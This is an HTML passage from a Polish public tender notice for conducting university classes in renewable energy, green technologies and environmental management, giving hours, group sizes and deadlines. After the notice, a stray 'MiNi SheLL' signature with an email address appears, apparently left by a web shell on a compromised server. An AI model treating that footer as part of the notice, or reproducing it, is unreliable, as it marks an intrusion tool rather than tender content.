<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B: Przeprowadzenie zajęć z przedmiotu Odnawialne źródła energii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 1)  Wykonawca przeprowadzi łącznie do 66 godzin zajęć,
2)  zajęcia dla każdej grupy obejmować będą  2 godziny zajęć teoretycznych i 4 godziny zajęć praktycznych (łącznie 6 godzin zajęć dla każdej grupy) i odbywać się będą w dni robocze. Przez godzinę Zamawiający rozumie godzinę lekcyjną czyli 45 minut,
3)  zajęcia będą prowadzone dla maksymalnie 11 grup, liczących maksymalnie po 13 osób, z tym, że w przypadku uczestniczenia w zajęciach mniejszej niż zakładana przez Zamawiającego maksymalna liczba studentów, w pierwszej kolejności Zamawiający zmniejszy liczbę studentów w grupie tak by utrzymać liczbę grup na zakładanym poziomie 11, a dopiero w drugiej kolejności nastąpi zmniejszenie liczby grup, jednakże do liczby nie mniejszej niż 8 grup,
4) Zamawiający udostępni Wykonawcy, w terminie do 15 dni po rozpoczęciu każdego semestru, plan zajęć studentów, celem dokładnego ustalenia przez Wykonawcę terminu zajęć będących przedmiotem niniejszego postępowania. 

2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ, stanowiący integralną część SIWZ.
3. Wymagany termin realizacji zamówienia: 
 do 30.06.2014r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część C: Przeprowadzenie zajęć z przedmiotu  Technologie przyjazne dla środowiska naturalnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1)  Wykonawca przeprowadzi łącznie do 66 godzin zajęć,
2)  zajęcia dla każdej grupy obejmować będą  2 godziny zajęć teoretycznych i 4 godziny zajęć praktycznych (łącznie 6 godzin zajęć dla każdej grupy) i odbywać się będą w dni robocze. Przez godzinę Zamawiający rozumie godzinę lekcyjną czyli 45 minut,
3)  zajęcia będą prowadzone dla maksymalnie 11 grup, liczących maksymalnie po 13 osób, z tym, że w przypadku uczestniczenia w zajęciach mniejszej niż zakładana przez Zamawiającego maksymalna liczba studentów, w pierwszej kolejności Zamawiający zmniejszy liczbę studentów w grupie tak by utrzymać liczbę grup na zakładanym poziomie 11, a dopiero w drugiej kolejności nastąpi zmniejszenie liczby grup, jednakże do liczby nie mniejszej niż 8 grup,
4) Zamawiający udostępni Wykonawcy, w terminie do 15 dni po rozpoczęciu każdego semestru, plan zajęć studentów, celem dokładnego ustalenia przez Wykonawcę terminu zajęć będących przedmiotem niniejszego postępowania. 

2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ, stanowiący integralną część SIWZ.
3. Wymagany termin realizacji zamówienia: 
 do 31.12.2013r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część D: Przeprowadzenie zajęć z przedmiotu Zarządzanie środowiskowe w przedsiębiorstwie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 1)  Wykonawca przeprowadzi łącznie do 66 godzin zajęć,
2)  zajęcia dla każdej grupy obejmować będą  2 godziny zajęć teoretycznych i 4 godziny zajęć praktycznych (łącznie 6 godzin zajęć dla każdej grupy) i odbywać się będą w dni robocze. Przez godzinę Zamawiający rozumie godzinę lekcyjną czyli 45 minut,
3)  zajęcia będą prowadzone dla maksymalnie 11 grup, liczących maksymalnie po 13 osób, z tym, że w przypadku uczestniczenia w zajęciach mniejszej niż zakładana przez Zamawiającego maksymalna liczba studentów, w pierwszej kolejności Zamawiający zmniejszy liczbę studentów w grupie tak by utrzymać liczbę grup na zakładanym poziomie 11, a dopiero w drugiej kolejności nastąpi zmniejszenie liczby grup, jednakże do liczby nie mniejszej niż 8 grup,
4) Zamawiający udostępni Wykonawcy, w terminie do 15 dni po rozpoczęciu każdego semestru, plan zajęć studentów, celem dokładnego ustalenia przez Wykonawcę terminu zajęć będących przedmiotem niniejszego postępowania. 

2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ, stanowiący integralną część SIWZ.
3. Wymagany termin realizacji zamówienia: 
 do 31.03.2014r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com